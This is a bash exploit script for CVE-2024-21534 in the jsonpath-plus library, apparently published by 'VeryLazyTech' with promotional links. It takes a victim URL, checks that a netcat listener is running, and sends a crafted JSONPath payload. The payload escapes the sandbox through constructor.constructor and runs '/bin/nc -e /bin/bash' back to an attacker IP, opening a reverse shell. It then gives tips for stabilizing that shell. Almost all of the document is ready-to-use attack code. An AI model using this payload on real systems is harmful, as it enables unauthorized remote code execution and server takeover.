# CVE-2024-21534 Jsonpath-plus vulnerable to Remote Code Execution (RCE) due to improper input sanitization
# FOFA "Jsonpath-plus"
# Medium https://medium.com/@verylazytech
# Github https://github.com/verylazytech
# BuyMeACoffee https://buymeacoffee.com/verylazytech
# https://www.verylazytech.com


#!/usr/bin/env bash

# Banner function
banner() {
cat <<'EOF'
  ______     _______   ____   ___ ____  _  _     ____  _ ____ _____ _  _   
 / ___\ \   / / ____| |___ \ / _ \___ \| || |   |___ \/ | ___|___ /| || |  
| |    \ \ / /|  _|     __) | | | |__) | || |_    __) | |___ \ |_ \| || |_ 
| |___  \ V / | |___   / __/| |_| / __/|__   _|  / __/| |___) |__) |__   _|
 \____|  \_/  |_____| |_____|\___/_____|  |_|   |_____|_|____/____/   |_|  
                                                                           
__     __                _                      _____         _     
\ \   / /__ _ __ _   _  | |    __ _ _____   _  |_   _|__  ___| |__  
 \ \ / / _ \ '__| | | | | |   / _` |_  / | | |   | |/ _ \/ __| '_ \ 
  \ V /  __/ |  | |_| | | |__| (_| |/ /| |_| |   | |  __/ (__| | | |
   \_/ \___|_|   \__, | |_____\__,_/___|\__, |   |_|\___|\___|_| |_|
                 |___/                  |___/                       


                    @VeryLazyTech - Medium
                    
EOF
}

# Call the banner function
banner

set -e

# Check for correct number of arguments
if [ "$#" -ne 3 ]; then
    printf "Usage: $0 <VICTIM_URL> <ATTACKER_IP> <ATTACKER_PORT>"
    exit 1
fi

VICTIM_URL="$1"
ATTACKER_IP="$2"
ATTACKER_PORT="$3"

echo "[*] Checking if listener on $ATTACKER_IP:$ATTACKER_PORT..."
echo "-----------------------------------------------------------"
if netstat -tuln | grep -q ":$ATTACKER_PORT"; then
    echo "[*] Great listener already running on $ATTACKER_IP:$ATTACKER_PORT"
else
    echo "[*] Oh no! Listener not found on $ATTACKER_IP:$ATTACKER_PORT. Exiting."
    echo "[*] Please make sure to run nc -lnvp 443 first!"
    exit 1
fi

sleep 2

# Craft the exploit payload using curl
echo "[*] Sending exploit payload to the target..."
echo "[*] Check your listener..."
echo "-----------------------------------------------------------"
echo "[*] Genral tips:"
echo "[1] For full shell copy and paste '/usr/bin/script -qc /bin/bash /dev/null' into your shell"
echo "[2] Please norice that every command that you run outside the shell, will run on the server but without output!"
echo "[3] For Exit just type exit in your shell"
echo "[4] You can now close me"


curl -X POST $VICTIM_URL \
-H "Content-Type: application/json" \
-d "{\"json\": {\"dummy\": true}, \"path\": \"\$[?(var _\$_root=constructor.constructor.call([],\\\"this.process.mainModule.require(\\\\\\\"child_process\\\\\\\").execSync(\\\\\\\"/bin/nc -e /bin/bash $ATTACKER_IP $ATTACKER_PORT\\\\\\\").toString();\\\");@root())]\"}"